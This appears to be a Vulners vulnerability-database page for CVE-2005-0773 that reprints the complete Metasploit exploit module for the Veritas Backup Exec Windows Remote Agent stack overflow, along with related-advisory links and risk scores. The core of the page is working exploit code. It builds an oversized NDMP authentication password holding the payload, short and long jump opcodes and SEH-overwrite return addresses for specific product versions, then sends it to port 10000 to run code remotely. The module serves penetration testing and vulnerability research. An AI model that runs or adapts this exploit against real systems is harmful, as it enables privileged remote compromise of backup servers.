Lucene search
K

Veritas Backup Exec Windows Remote Agent Overflow

🗓️ 16 Jan 2006 02:59:47Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 23 Views

Veritas Backup Exec Windows Remote Agent Overflow vulnerability allows for stack buffer overflow during client authentication request with type '3' and a long password. Reliable execution obtained by smashing a SEH pointer

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2005-0773
3 Jul 201000:00
circl
CVE
CVE-2005-0773
29 Jun 200504:00
cve
Cvelist
CVE-2005-0773
29 Jun 200504:00
cvelist
Exploit DB
Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)
3 Jul 201000:00
exploitdb
NVD
CVE-2005-0773
18 Jun 200504:00
nvd
OpenVAS
VERITAS Backup Exec Remote Agent Windows Servers BOF Vulnerability
15 Oct 201200:00
openvas
Packet Storm
backupexec_agent.pm.txt
29 Jun 200500:00
packetstorm
Packet Storm
Veritas Backup Exec Windows Remote Agent Overflow
30 Oct 200900:00
packetstorm
Saint
VERITAS Backup Exec CONNECT_CLIENT_AUTH buffer overflow
22 Dec 200500:00
saint
Saint
VERITAS Backup Exec CONNECT_CLIENT_AUTH buffer overflow
22 Dec 200500:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::NDMP

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Veritas Backup Exec Windows Remote Agent Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Veritas
        BackupExec Windows Agent software. This vulnerability occurs
        when a client authentication request is received with type
        '3' and a long password argument. Reliable execution is
        obtained by abusing the stack buffer overflow to smash a SEH
        pointer.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-0773'],
          [ 'OSVDB', '17624'],
          [ 'BID', '14022'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => %w{ win },
      'Targets'        =>
        [
          [
            'Veritas BE 9.0/9.1/10.0 (All Windows)',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x0140f8d5, 0x014261b0 ],
            },
          ],
          [
            'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x75022ac4, 0x75022ac4 ],
            },
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2005-06-22'))

    register_options(
      [
        Opt::RPORT(10000)
      ])
  end

  def check
    info = ndmp_info()
    if (info and info['Version'])
      vprint_status(" Vendor: #{info['Vendor']}")
      vprint_status("Product: #{info['Product']}")
      vprint_status("Version: #{info['Version']}")

      if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
        return Exploit::CheckCode::Appears
      end
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    resp = ndmp_recv()

    username = 'X' * 512
    password = rand_text_alphanumeric(8192)

    # Place our payload early in the request and jump backwards into it
    password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded

    # This offset is required for version 10.0
    password[3536, 2] = "\xeb\x06"
    password[3540, 4] = [ target['Rets'][1] ].pack('V')
    password[3544, 5] = "\xe9" + [-1037].pack('V')

    # This offset is required for version 9.0/9.1
    password[4524, 2] = "\xeb\x06"
    password[4528, 4] = [ target['Rets'][0] ].pack('V')
    password[4532, 5] = "\xe9" + [-2025].pack('V')

    # Create the authentication request
    auth = [
        1,               # Sequence number
        Time.now.to_i,   # Current time
        0,               # Message type (request)
        0x901,           # Message name (connect_client_auth)
        0,               # Reply sequence number
        0,               # Error status
        3                # Authentication type
      ].pack('NNNNNNN') +
      [ username.length ].pack('N') + username +
      [ password.length ].pack('N') + password +
      [ 4 ].pack('N')

    print_status("Sending authentication request...")
    ndmp_send(auth)

    # Attempt to read a reply (this should fail)
    ndmp_recv()

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.9High risk
Vulners AI Score7.9
CVSS 27.5
EPSS0.86365
23